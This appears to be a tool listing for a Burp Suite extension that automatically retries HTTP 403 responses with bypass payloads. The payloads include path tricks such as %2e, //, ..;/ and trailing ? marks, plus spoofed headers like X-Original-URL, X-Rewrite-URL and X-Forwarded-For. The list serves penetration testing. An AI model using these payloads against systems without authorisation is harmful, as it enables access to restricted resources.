403Bypasser - Burpsuite Extension To Bypass 403 Restricted Directory

An burpsuite extension to bypass 403 restricted directory. By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.

Payloads: $1: HOSTNAME $2: PATH

$1/$2$1/%2e/$2$1/$2/.$1//$2//$1/./$2/./$1/$2anything -H "X-Original-URL: /$2" $1/$2 -H "X-Custom-IP-Authorization:" $1 -H "X-Rewrite-URL: /$2"$1/$2 -H "Referer: /$2"$1/$2 -H "X-Originating-IP:"$1/$2 -H "X-Forwarded-For:"$1/$2 -H "X-Remote-IP:"$1/$2 -H "X-Client-IP:"$1/$2 -H "X-Host:"$1/$2 -H "X-Forwared-Host:"$1/$2%20/$1/%20$2%20/$1/$2?$1/$2???$1/$2//$1/$2/$1/$2/.randomstring$1/$2..;/

Thanks @lohubi for contributing many payloads.


BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish


Disqus Comments